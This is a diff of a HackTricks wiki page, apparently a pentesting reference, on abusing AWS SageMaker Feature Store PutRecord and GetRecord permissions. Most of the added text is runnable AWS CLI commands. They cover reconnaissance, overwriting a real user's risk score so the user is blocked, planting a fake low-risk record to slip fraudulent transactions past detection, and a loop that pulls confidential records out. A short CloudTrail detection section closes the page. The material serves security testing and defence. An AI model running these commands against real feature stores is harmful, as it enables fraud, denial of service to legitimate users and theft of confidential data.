HackTricks-wiki
diff --git a/‎src/pentesting-cloud/aws-security/aws-post-exploitation/aws-sagemaker-post-exploitation/feature-store-poisoning.md‎
Lines changed: 149 additions & 29 deletions b/‎src/pentesting-cloud/aws-security/aws-post-exploitation/aws-sagemaker-post-exploitation/feature-store-poisoning.md‎
Lines changed: 149 additions & 29 deletions
@@ -1,53 +1,173 @@
 # SageMaker Feature Store online store poisoning
 
-Abuse `sagemaker:PutRecord` on a Feature Group with OnlineStore enabled to overwrite live feature values consumed by online inference. Combined with `sagemaker:GetRecord`, an attacker can read sensitive features. This does not require access to models or endpoints.
+Abuse `sagemaker:PutRecord` on a Feature Group with OnlineStore enabled to overwrite live feature values consumed by online inference. Combined with `sagemaker:GetRecord`, an attacker can read sensitive features and exfiltrate confidential ML data. This does not require access to models or endpoints, making it a direct data-layer attack.
 
 ## Requirements
 - Permissions: `sagemaker:ListFeatureGroups`, `sagemaker:DescribeFeatureGroup`, `sagemaker:PutRecord`, `sagemaker:GetRecord`
 - Target: Feature Group with OnlineStore enabled (typically backing real-time inference)
+- Complexity: **LOW** - Simple AWS CLI commands, no model manipulation required
 
 ## Steps
-1) Pick or create a small Online Feature Group for testing
+
+### Reconnaissance
+
+1) List Feature Groups with OnlineStore enabled
+```bash
+REGION=${REGION:-us-east-1}
+aws sagemaker list-feature-groups \
+  --region $REGION \
+  --query "FeatureGroupSummaries[?OnlineStoreConfig!=null].[FeatureGroupName,CreationTime]" \
+  --output table
+```
+
+2) Describe a target Feature Group to understand its schema
+```bash
+FG=<feature-group-name>
+aws sagemaker describe-feature-group \
+  --region $REGION \
+  --feature-group-name "$FG"
+```
+
+Note the `RecordIdentifierFeatureName`, `EventTimeFeatureName`, and all feature definitions. These are required for crafting valid records.
+
+### Attack Scenario 1: Data Poisoning (Overwrite Existing Records)
+
+1) Read the current legitimate record
+```bash
+aws sagemaker-featurestore-runtime get-record \
+  --region $REGION \
+  --feature-group-name "$FG" \
+  --record-identifier-value-as-string user-001
+```
+
+2) Poison the record with malicious values using inline `--record` parameter
+```bash
+NOW=$(date -u +%Y-%m-%dT%H:%M:%SZ)
+
+# Example: Change risk_score from 0.15 to 0.99 to block a legitimate user
+aws sagemaker-featurestore-runtime put-record \
+  --region $REGION \
+  --feature-group-name "$FG" \
+  --record "[
+    {\"FeatureName\": \"entity_id\", \"ValueAsString\": \"user-001\"},
+    {\"FeatureName\": \"event_time\", \"ValueAsString\": \"$NOW\"},
+    {\"FeatureName\": \"risk_score\", \"ValueAsString\": \"0.99\"},
+    {\"FeatureName\": \"transaction_amount\", \"ValueAsString\": \"125.50\"},
+    {\"FeatureName\": \"account_status\", \"ValueAsString\": \"POISONED\"}
+  ]" \
+  --target-stores OnlineStore
+```
+
+3) Verify the poisoned data
+```bash
+aws sagemaker-featurestore-runtime get-record \
+  --region $REGION \
+  --feature-group-name "$FG" \
+  --record-identifier-value-as-string user-001
+```
+
+**Impact**: ML models consuming this feature will now see `risk_score=0.99` for a legitimate user, potentially blocking their transactions or services.
+
+### Attack Scenario 2: Malicious Data Injection (Create Fraudulent Records)
+
+Inject completely new records with manipulated features to evade security controls:
+
+```bash
+NOW=$(date -u +%Y-%m-%dT%H:%M:%SZ)
+
+# Create fake user with artificially low risk to perform fraudulent transactions
+aws sagemaker-featurestore-runtime put-record \
+  --region $REGION \
+  --feature-group-name "$FG" \
+  --record "[
+    {\"FeatureName\": \"entity_id\", \"ValueAsString\": \"user-999\"},
+    {\"FeatureName\": \"event_time\", \"ValueAsString\": \"$NOW\"},
+    {\"FeatureName\": \"risk_score\", \"ValueAsString\": \"0.01\"},
+    {\"FeatureName\": \"transaction_amount\", \"ValueAsString\": \"999999.99\"},
+    {\"FeatureName\": \"account_status\", \"ValueAsString\": \"approved\"}
+  ]" \
+  --target-stores OnlineStore
+```
+
+Verify the injection:
+```bash
+aws sagemaker-featurestore-runtime get-record \
+  --region $REGION \
+  --feature-group-name "$FG" \
+  --record-identifier-value-as-string user-999
+```
+
+**Impact**: Attacker creates a fake identity with low risk score (0.01) that can perform high-value fraudulent transactions without triggering fraud detection.
+
+### Attack Scenario 3: Sensitive Data Exfiltration
+
+Read multiple records to extract confidential features and profile model behavior:
+
+```bash
+# Exfiltrate data for known users
+for USER_ID in user-001 user-002 user-003 user-999; do
+  echo "Exfiltrating data for ${USER_ID}:"
+  aws sagemaker-featurestore-runtime get-record \
+    --region $REGION \
+    --feature-group-name "$FG" \
+    --record-identifier-value-as-string ${USER_ID}
+done
+```
+
+**Impact**: Confidential features (risk scores, transaction patterns, personal data) exposed to attacker.
+
+### Testing/Demo Feature Group Creation (Optional)
+
+If you need to create a test Feature Group:
+
 ```bash
 REGION=${REGION:-us-east-1}
 FG=$(aws sagemaker list-feature-groups --region $REGION --query "FeatureGroupSummaries[?OnlineStoreConfig!=null]|[0].FeatureGroupName" --output text)
 if [ -z "$FG" -o "$FG" = "None" ]; then
   ACC=$(aws sts get-caller-identity --query Account --output text)
-  FG=ht-fg-$ACC-$(date +%s)
+  FG=test-fg-$ACC-$(date +%s)
   ROLE_ARN=$(aws iam get-role --role-name AmazonSageMaker-ExecutionRole --query Role.Arn --output text 2>/dev/null || echo arn:aws:iam::$ACC:role/service-role/AmazonSageMaker-ExecutionRole)
-  aws sagemaker create-feature-group --region $REGION --feature-group-name "$FG" --record-identifier-feature-name entity_id --event-time-feature-name event_time --feature-definitions "[{\"FeatureName\":\"entity_id\",\"FeatureType\":\"String\"},{\"FeatureName\":\"event_time\",\"FeatureType\":\"String\"},{\"FeatureName\":\"risk_score\",\"FeatureType\":\"Fractional\"}]" --online-store-config "{\"EnableOnlineStore\":true}" --role-arn "$ROLE_ARN"
+  
+  aws sagemaker create-feature-group \
+    --region $REGION \
+    --feature-group-name "$FG" \
+    --record-identifier-feature-name entity_id \
+    --event-time-feature-name event_time \
+    --feature-definitions "[
+      {\"FeatureName\":\"entity_id\",\"FeatureType\":\"String\"},
+      {\"FeatureName\":\"event_time\",\"FeatureType\":\"String\"},
+      {\"FeatureName\":\"risk_score\",\"FeatureType\":\"Fractional\"},
+      {\"FeatureName\":\"transaction_amount\",\"FeatureType\":\"Fractional\"},
+      {\"FeatureName\":\"account_status\",\"FeatureType\":\"String\"}
+    ]" \
+    --online-store-config "{\"EnableOnlineStore\":true}" \
+    --role-arn "$ROLE_ARN"
+  
   echo "Waiting for feature group to be in Created state..."
   for i in $(seq 1 40); do
     ST=$(aws sagemaker describe-feature-group --region $REGION --feature-group-name "$FG" --query FeatureGroupStatus --output text || true)
-    echo $ST; [ "$ST" = "Created" ] && break; sleep 15
+    echo "$ST"; [ "$ST" = "Created" ] && break; sleep 15
   done
 fi
-```
 
-2) Insert/overwrite an online record (poison)
-```bash
-NOW=$(date -u +%Y-%m-%dT%H:%M:%SZ)
-cat > /tmp/put.json << JSON
-{
-  "FeatureGroupName": "$FG",
-  "Record": [
-    {"FeatureName": "entity_id", "ValueAsString": "user-123"},
-    {"FeatureName": "event_time", "ValueAsString": "$NOW"},
-    {"FeatureName": "risk_score", "ValueAsString": "0.99"}
-  ],
-  "TargetStores": ["OnlineStore"]
-}
-JSON
-aws sagemaker-featurestore-runtime put-record --region $REGION --cli-input-json file:///tmp/put.json
+echo "Feature Group ready: $FG"
 ```
 
-3) Read back the record to confirm manipulation
-```bash
-aws sagemaker-featurestore-runtime get-record --region $REGION --feature-group-name "$FG" --record-identifier-value-as-string user-123 --feature-name risk_score --query "Record[0].ValueAsString"
-```
 
-Expected: risk_score returns 0.99 (attacker-set), proving ability to change online features consumed by models.
+## Detection
+
+Monitor CloudTrail for suspicious patterns:
+- `PutRecord` events from unusual IAM principals or IP addresses
+- High frequency `PutRecord` or `GetRecord` calls
+- `PutRecord` with anomalous feature values (e.g., risk_score outside normal range)
+- Bulk `GetRecord` operations indicating mass exfiltration
+- Access outside normal business hours or from unexpected locations
+
+Implement anomaly detection:
+- Feature value validation (e.g., risk_score must be 0.0-1.0)
+- Write pattern analysis (frequency, timing, source identity)
+- Data drift detection (sudden changes in feature distributions)
 
-## Impact
-- Real-time integrity attack: manipulate features used by production models without touching endpoints/models.
-- Confidentiality risk: read sensitive features via GetRecord from OnlineStore.
+## References
+- [AWS SageMaker Feature Store Documentation](https://docs.aws.amazon.com/sagemaker/latest/dg/feature-store.html)
+- [Feature Store Security Best Practices](https://docs.aws.amazon.com/sagemaker/latest/dg/feature-store-security.html)